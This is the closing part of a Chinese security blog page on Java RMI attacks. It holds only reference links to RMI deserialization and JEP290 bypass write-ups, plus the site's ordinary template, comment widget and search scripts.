<p><a target="_blank" rel="noopener" href="https://halfblue.github.io/2021/11/03/RMI%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E4%B9%8B%E4%B8%89%E9%A1%BE%E8%8C%85%E5%BA%90-JEP290%E7%BB%95%E8%BF%87/">RMI反序列化漏洞之三顾茅庐-JEP290绕过 | Halfblue</a>（UnicastRef的反序列化的部分细节可以看这个</p>
<p><a target="_blank" rel="noopener" href="https://su18.org/post/rmi-attack/%EF%BC%88%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%83%A8%E5%88%86%E9%83%BD%E6%8A%84%E7%9A%84%E8%BF%99%E4%B8%AA">https://su18.org/post/rmi-attack/（反序列化部分都抄的这个</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7932">https://xz.aliyun.com/t/7932</a></p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/211722">https://www.anquanke.com/post/id/211722</a></p>
<p><a target="_blank" rel="noopener" href="https://yagsheg.com/2021/11/29/RMI-%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F%E5%A4%8D%E7%9B%98%E6%80%BB%E7%BB%93">https://yagsheg.com/2021/11/29/RMI-%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F%E5%A4%8D%E7%9B%98%E6%80%BB%E7%BB%93</a></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Ethe</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://Ethe448.github.io/2023/05/20/RMI%E6%94%BB%E5%87%BB%EF%BC%88%E4%B8%89%EF%BC%89/">https://Ethe448.github.io/2023/05/20/RMI%E6%94%BB%E5%87%BB%EF%BC%88%E4%B8%89%EF%BC%89/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Ethe</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                                    <span class="chip bg-color">web学习</span>
                                </a>
                            
                                <a href="/tags/Java/">
                                    <span class="chip bg-color">Java</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("https://epicture.oss-cn-beijing.aliyuncs.com/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: '9uxoX9BlIsmwlt8gNkGLF9Ow-gzGzoHsz',
        appKey: 'rrsgRW80sgJP9PdFwFycskT9',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '8',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

<!--酷Q推送-->


    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2023/05/22/JNDI%E6%B3%A8%E5%85%A5/">
                    <div class="card-image">
                        
                        
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/featureimages/1.jpg" class="responsive-img" alt="JNDI注入">
                        
                        <span class="card-title">JNDI注入</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2023-05-22
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Ethe
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                        <span class="chip bg-color">web学习</span>
                    </a>
                    
                    <a href="/tags/Java/">
                        <span class="chip bg-color">Java</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2023/05/19/%E8%AE%B0%E4%BA%8B%E7%B0%BF/">
                    <div class="card-image">
                        
                        
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/featureimages/9.jpg" class="responsive-img" alt="记事簿">
                        
                        <span class="card-title">记事簿</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            单独开篇文章记一下自己每天都干嘛了，督促一下自己，虽然现在记好像有点晚了hhh
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-05-19
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Ethe
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E9%9A%8F%E7%AC%94/">
                        <span class="chip bg-color">随笔</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/tocbot/tocbot.min.js"></script>
<script>
$(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h1, h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aplayer/APlayer.min.js"></script>
<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2025</span>
            
            <a href="/about" target="_blank">Ethe</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">239.5k</span>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/Ethe448" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1078240421@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1078240421" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1078240421" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>

    <!-- 白天和黑夜主题 -->
<div class="sum-moon-box">
  <a class="btn-floating btn-large waves-effect waves-light" onclick="switchNightMode()" title="切换主题" >
    <i id="sum-moon-icon" class="fas fa-sun" style="width:48px; height:48px; font-size: 28px;"></i>
  </a>
</div>

<script>
  function switchNightMode() {
    $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
      setTimeout(function () {
        $('body').hasClass('DarkMode') 
        ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
        : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
          
        setTimeout(function () {
          $('.Cuteen_DarkSky').fadeOut(1e3, function () {
            $(this).remove()
          })
        }, 2e3)
      })
  }
</script>

    <script>
    //模式判断 
    if (localStorage.getItem('isDark') === '0') {
        document.body.classList.add('DarkMode');
        $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')
    } else {
        document.body.classList.remove('DarkMode');
        $('#sum-moon-icon').removeleClass("fa-sun").addClass('fa-moon')
    }
    </script>

    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/materialize/materialize.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aos/aos.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

    
    
    <script async src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
